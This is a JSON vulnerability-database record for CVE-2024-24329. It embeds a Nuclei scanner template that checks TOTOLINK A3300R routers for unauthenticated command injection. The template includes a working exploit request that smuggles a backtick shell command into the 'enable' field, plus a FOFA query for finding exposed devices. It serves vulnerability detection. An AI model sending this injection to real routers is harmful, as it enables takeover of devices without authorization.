{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-24329/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-24329/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-24329/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-24329/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-24329/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-24329"},"sightings":{"href":"/api/v1/sightings/cve-2024-24329"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-24329.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2024-24329\n\ninfo:\n  name: TotoLink Router setPortForwardRules - Command Injection\n  author: pussycat0x\n  severity: critical\n  description: |\n    TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setPortForwardRules function.\n  impact: |\n    Unauthenticated attackers can execute arbitrary OS commands via the enable parameter, potentially compromising the entire TOTOLINK router.\n  remediation: |\n    Update TOTOLINK A3300R firmware to a version newer than V17.0.0cu.557_B20221024.\n  reference:\n    - https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/10/TOTOlink%20A3300R%20setPortForwardRules.md\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2024-24329\n    cwe-id: CWE-78\n    epss-score: 0.06172\n    epss-percentile: 0.93224\n    cpe: cpe:2.3:o:totolink:a3300r_firmware:17.0.0cu.557_b20221024:*:*:*:*:*:*:*\n  metadata:\n    vendor: totolink\n    product: a3300r_firmware\n    fofa-query: title=\"totolink\"\n  tags: cve,cve2024,totolink,router,toto_link,unauth,intrusive,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /cgi-bin/cstecgi.cgi?token=C6F41C563E86A379 HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json, text/javascript, */*; q=0.01\n        X-Requested-With: XMLHttpRequest\n        Origin: {{RootURL}}\n        Referer: {{RootURL}}/advance/portfwd.html?token=C6F41C563E86A379\n\n        {\"enable\":\"1`ls>/web/{{randstr}}.txt`\",\"addEffect\":\"0\",\"topicurl\":\"setPortForwardRules\"}\n\n      - |\n        GET /{{randstr}}.txt  HTTP/1.1\n        Host: {{Hostname}}\n        Referer: {{RootURL}}/advance/portfwd.html?token=C6F41C563E86A379\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code_1 == 200 && status_code_2 == 200'\n          - 'contains(body_1, \"\\\"success\\\":true\")'\n          - 'contains_all(body_2, \"bin\",\"etc\")'\n        condition: and\n# digest: 4a0a0047304502206625f9db47680c1f235d23b29e7b87d57a27cddaaa197c1cb0b0dfb1855b3a45022100b6a31fe0f7f1c93ac1529aef44308fa6472253f0cee1399b29cc061294f0479a:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2024-24329"}